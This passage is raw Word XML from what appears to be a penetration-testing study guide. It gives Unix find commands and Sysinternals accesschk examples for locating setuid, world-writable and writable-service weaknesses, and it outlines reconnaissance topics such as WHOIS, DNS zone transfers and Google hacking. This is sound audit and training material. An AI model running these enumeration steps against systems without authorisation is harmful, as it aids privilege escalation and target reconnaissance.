        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mbsa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (show usage + required files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>psinfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> + lookup (perl script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B14c - Finding interesting files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="0066782A" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0066782A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Checks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="0066782A" w:rsidRDefault="00FA3D71" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066782A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The system and users’ default umask should be set to 022 (as a minimum but ideally 027) to prevent daemon processes and users’ creating world writable files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="002E1750" w:rsidRDefault="00FA3D71" w:rsidP="00D06E2C">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Solaris: /etc/default</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E1750">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init,</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[CMASK,</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UMASK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/profile /etc/.logon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00D06E2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux: /etc</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E1750">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profile,</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bashrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,skel/.bashrc,csh.login,csh.cshrc] + roots</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(user)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="002E1750" w:rsidRDefault="00FA3D71" w:rsidP="00D06E2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1750">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>Redhat: /etc/sysconfig/init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> (daemon)</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setuid and setgid files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00D06E2C"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-type f \(-perm -04000 -o –perm -02000 ) –print &gt; sufiles.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="0066782A" w:rsidRDefault="00FA3D71" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0066782A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0066782A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> use checksufiles.sh</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world writable file and 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–perm -0002 ) –print &gt; worldwritable.out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group writable files and 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-perm -0020 –print &gt; groupwritable.out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world writable directories without sticky bit set:</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-type d \(-perm -0002 –a ! –perm -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A257D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1000 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A257D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –print &gt; worlddirnosticky.out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un-owned files/directories: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\(-nouser –o –nogroup ) –print &gt; unowned.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71"/>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00D06E2C" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Checks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00F40EC3" w:rsidRDefault="003D26E6" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AccessEnum</w:t>
      </w:r>
      <w:r w:rsidR="00D23712" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(sysinte</w:t>
      </w:r>
      <w:r w:rsidR="00D23712" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nal</w:t>
      </w:r>
      <w:r w:rsidR="00D23712" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - gui)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D26E6" w:rsidRPr="00F40EC3" w:rsidRDefault="003D26E6" w:rsidP="00F40EC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AccessEnum.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00F40EC3" w:rsidRDefault="00D06E2C" w:rsidP="00F40EC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Can view all file/or registry permissions for entire directories/hives. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Useful for highlighting weak file/registry permissions.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00F40EC3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00F40EC3" w:rsidRDefault="00D23712" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Accesschk (sysinternals – cmdline)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23712" w:rsidRPr="00F40EC3"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everyone -w</w:t>
      </w:r>
      <w:r w:rsidR="0082714B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uv</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s c:\</w:t>
      </w:r>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> files everyone can write to in c:)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23712" w:rsidRPr="00F40EC3"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users -w</w:t>
      </w:r>
      <w:r w:rsidR="0082714B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uv</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s c:\</w:t>
      </w:r>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> files users can write to in c:)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23712"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everyone -ks</w:t>
      </w:r>
      <w:r w:rsidR="0082714B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uw hklm\</w:t>
      </w:r>
      <w:r w:rsidR="00F40EC3" w:rsidRPr="00F40EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(all keys everyone can write to in HKLM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082714B" w:rsidRPr="00F40EC3" w:rsidRDefault="0082714B" w:rsidP="00F40EC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe "user" –wcvu * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(all svc's that can be written by "user")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800AF4" w:rsidRDefault="00800AF4" w:rsidP="009B4D72">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Background Information Gathering &amp; Open Source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800AF4" w:rsidRDefault="00800AF4" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="572"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="5632"/>
        <w:gridCol w:w="889"/>
      </w:tblGrid>
      <w:tr w:rsidR="00800AF4" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572"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C1</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Registration Records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contained within the IP and domain registries (WHOIS)</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C2</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Domain Name Server (DNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>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DNS queries and responses</w:t>
            </w:r>
          </w:p>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DNS zone transfers</w:t>
            </w:r>
          </w:p>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Structure, interpretation and analysis of DNS records:</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SOA</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MX</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TXT</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A</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NS</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PTR</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HINFO</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00800AF4"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CNAME</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C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00800AF4"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Customer Web Site Analysis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Analysis of information from a target web site, both from displayed content and from within the HTML source.</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C4</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Google Hacking and Web Enumeration</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Effective use of search engines and other public data sources to gain information about a target.</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C5</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NNTP Newsgroups and Mailing Lists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Searching newsgroups or mailing lists for useful information about a target.</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C6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984"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Leakage from Mail &amp; News headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00800AF4" w:rsidRDefault="00800AF4" w:rsidP="000336A2">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Analysing news group and e-mail headers to identify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>internal system information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889"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9B4D72" w:rsidRDefault="009B4D72" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>C1 - Registration Records</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Information contained within the IP and domain registries (WHOIS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6182C" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network Information Centers (NICs) store useful information in WHOIS databases, primarily as network, route, or person objects. WHOIS database objects define which areas of the Internet space are registered to which organisations, with other information such as routing and contact details in the case of abuse. The following information can typically be obtained from the various WHOIS databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
